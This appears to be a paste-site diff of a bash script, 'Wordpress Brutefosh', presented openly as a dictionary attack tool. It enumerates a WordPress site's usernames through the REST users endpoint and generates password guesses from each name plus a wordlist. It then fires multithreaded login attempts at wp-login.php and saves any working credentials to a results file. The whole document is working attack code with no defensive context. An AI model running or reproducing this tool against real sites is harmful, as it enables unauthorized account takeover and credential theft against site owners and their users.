SHOW:
|
|
- or go back to the newest paste.
1 | #!/bin/bash | |
2 | # Name : Wordpress Brutefosh | |
3 | # Version : 2.0 | |
4 | # Desc. : Dictionary Attack Tool - Wordpress Admin | |
5 | - | # Coded by : Schopath |
5 | + | |
6 | - | # Website : www.zerobyte.id |
6 | + | |
7 | #----------- CONFIGURATION ----------- | |
8 | curl_timeout=20 | |
9 | multithread_limit=10 | |
10 | #--------- CONFIGURATION EOF --------- | |
11 | ||
12 | if [[ -f wpusername.tmp ]] | |
13 | then | |
14 | rm wpusername.tmp | |
15 | fi | |
16 | ||
17 | RED='\e[31m' | |
18 | GRN='\e[32m' | |
19 | YEL='\e[33m' | |
20 | CLR='\e[0m' | |
21 | ||
22 | function _GetUserWPJSON() { | |
23 | Target="${1}"; | |
24 | UsernameLists=$(curl --connect-timeout ${curl_timeout} --max-time ${curl_timeout} -s "${Target}/wp-json/wp/v2/users" | grep -Po '"slug":"\K.*?(?=")'); | |
25 | echo "" | |
26 | if [[ -z ${UsernameLists} ]]; | |
27 | then | |
28 | echo -e "${YEL}INFO: Cannot detect Username!${CLR}" | |
29 | else | |
30 | echo -ne > wpusername.tmp | |
31 | for Username in ${UsernameLists}; | |
32 | do | |
33 | echo "INFO: Found username \"${Username}\"..." | |
34 | echo "${Username}" >> wpusername.tmp | |
35 | done | |
36 | fi | |
37 | } | |
38 | ||
39 | function _TestLogin() { | |
40 | Target="${1}" | |
41 | Username="${2}" | |
42 | Password="${3}" | |
43 | LetsTry=$(curl --connect-timeout ${curl_timeout} --max-time ${curl_timeout} -s -w "\nHTTP_STATUS_CODE_X %{http_code}\n" "${Target}/wp-login.php" --data "log=${Username}&pwd=${Password}&wp-submit=Log+In" --compressed) | |
44 | if [[ ! -z $(echo ${LetsTry} | grep login_error | grep div) ]]; | |
45 | then | |
46 | echo -e "${YEL}INFO: Invalid ${Target} ${Username}:${Password}${CLR}" | |
47 | elif [[ $(echo ${LetsTry} | grep "HTTP_STATUS_CODE_X" | awk '{print $2}') == "302" ]]; | |
48 | then | |
49 | echo -e "${GRN}[!] FOUND ${Target} \e[30;48;5;82m ${Username}:${Password} ${CLR}" | |
50 | echo "${Target} [${Username}:${Password}]" >> wpbf-results.txt | |
51 | else | |
52 | echo -e "${YEL}INFO: Invalid ${Target} ${Username}:${Password}${CLR}" | |
53 | fi | |
54 | } | |
55 | ||
56 | function PasswdGenerator() { | |
57 | WORD="${1}" | |
58 | echo "${WORD}" | |
59 | echo "${WORD}" | tr a-z A-Z | |
60 | echo "${WORD}123" | |
61 | echo "${WORD}123" | tr a-z A-Z | |
62 | echo "${WORD}admin" | |
63 | echo "${WORD}${WORD}" | |
64 | echo "${WORD}${WORD}123" | |
65 | echo "${WORD}${WORD}" | tr a-z A-Z | |
66 | echo "${WORD}${WORD}123" | tr a-z A-Z | |
67 | foo=${WORD:0};echo ${foo^} | |
68 | foo=${WORD:0};echo ${foo^}123 | |
69 | for ((c=1;c<=99;c++)) | |
70 | do | |
71 | echo "${WORD}${c}" | |
72 | done | |
73 | for ((c=1;c<=9;c++)) | |
74 | do | |
75 | echo "${WORD}0${c}" | |
76 | done | |
77 | for ((c=1900;c<=$(date +%Y);c++)) | |
78 | do | |
79 | echo "${WORD}${c}" | |
80 | done | |
81 | for ((c=1;c<=99;c++)) | |
82 | do | |
83 | foo=${WORD:0};echo ${foo^}${c} | |
84 | done | |
85 | for ((c=1;c<=9;c++)) | |
86 | do | |
87 | foo=${WORD:0};echo ${foo^}0${c} | |
88 | done | |
89 | for ((c=1900;c<=$(date +%Y);c++)) | |
90 | do | |
91 | foo=${WORD:0};echo ${foo^}${c} | |
92 | done | |
93 | } | |
94 | ||
95 | echo ' _ _ _ ' | |
96 | echo '| | | | ___ _ __ __| |_ __ _ __ ___ ___ ___ ' | |
97 | echo '| |/\| |/ _ \| `__/ _` | `_ \| `__/ _ \/ __/ __|' | |
98 | echo '\ /\ / (_) | | | (_| | |_) | | | __/\__ \__ \' | |
99 | echo ' \/ \/ \___/|_| \__,_| .__/|_| \___||___/___/' | |
100 | echo ' |_|.::Brutefo(sh) 2019::.' | |
101 | echo '' | |
102 | ||
103 | echo -ne "[?] Input website target : " | |
104 | read Target | |
105 | ||
106 | curl --connect-timeout ${curl_timeout} --max-time ${curl_timeout} -s "${Target}/wp-login.php" > wplogin.tmp | |
107 | if [[ -z $(cat wplogin.tmp | grep "wp-submit") ]]; | |
108 | then | |
109 | echo -e "${RED}ERROR: Invalid wordpress wp-login!${CLR}" | |
110 | exit | |
111 | fi | |
112 | ||
113 | echo -ne "[?] Input password lists in (file) : " | |
114 | read PasswordLists | |
115 | ||
116 | if [[ ! -f ${PasswordLists} ]] | |
117 | then | |
118 | echo -e "${RED}ERROR: Wordlists not found!${CLR}" | |
119 | PasswordLists=/dev/null | |
120 | fi | |
121 | ||
122 | _GetUserWPJSON ${Target} | |
123 | ||
124 | if [[ -f wpusername.tmp ]] | |
125 | then | |
126 | for User in $(cat wpusername.tmp) | |
127 | do | |
128 | echo "INFO: Generate password from ${User}..." | |
129 | echo -ne "" > wpbf-passwords.lst.tmp | |
130 | PasswdGenerator ${User} >> wpbf-passwords.lst.tmp | |
131 | cat ${PasswordLists} >> wpbf-passwords.lst.tmp | |
132 | ( | |
133 | for Pass in $(cat wpbf-passwords.lst.tmp) | |
134 | do | |
135 | ((cthread=cthread%multithread_limit)); ((cthread++==0)) && wait | |
136 | _TestLogin ${Target} ${User} ${Pass} & | |
137 | done | |
138 | wait | |
139 | ) | |
140 | done | |
141 | echo -ne "" > wpbf-passwords.lst.tmp | |
142 | rm wpbf-passwords.lst.tmp | |
143 | else | |
144 | echo -e "${YEL}INFO: Cannot find username${CLR}" | |
145 | echo -ne "[?] Input username manually : " | |
146 | read User | |
147 | if [[ -z ${User} ]] | |
148 | then | |
149 | echo -e "${RED}ERROR: Username cannot be empty!${CLR}" | |
150 | exit | |
151 | fi | |
152 | echo "INFO: Generate password from ${User}..." | |
153 | echo -ne "" > wpbf-passwords.lst.tmp | |
154 | PasswdGenerator ${User} >> wpbf-passwords.lst.tmp | |
155 | cat ${PasswordLists} >> wpbf-passwords.lst.tmp | |
156 | ( | |
157 | for Pass in $(cat wpbf-passwords.lst.tmp) | |
158 | do | |
159 | ((cthread=cthread%multithread_limit)); ((cthread++==0)) && wait | |
160 | _TestLogin ${Target} ${User} ${Pass} & | |
161 | done | |
162 | wait | |
163 | ) | |
164 | echo -ne "" > wpbf-passwords.lst.tmp | |
165 | rm wpbf-passwords.lst.tmp | |
166 | fi | |
167 | echo "INFO: Found $(cat wpbf-results.txt | grep ${Target} | sort -nr | uniq | wc -l) username & password in ./wpbf-results.txt" |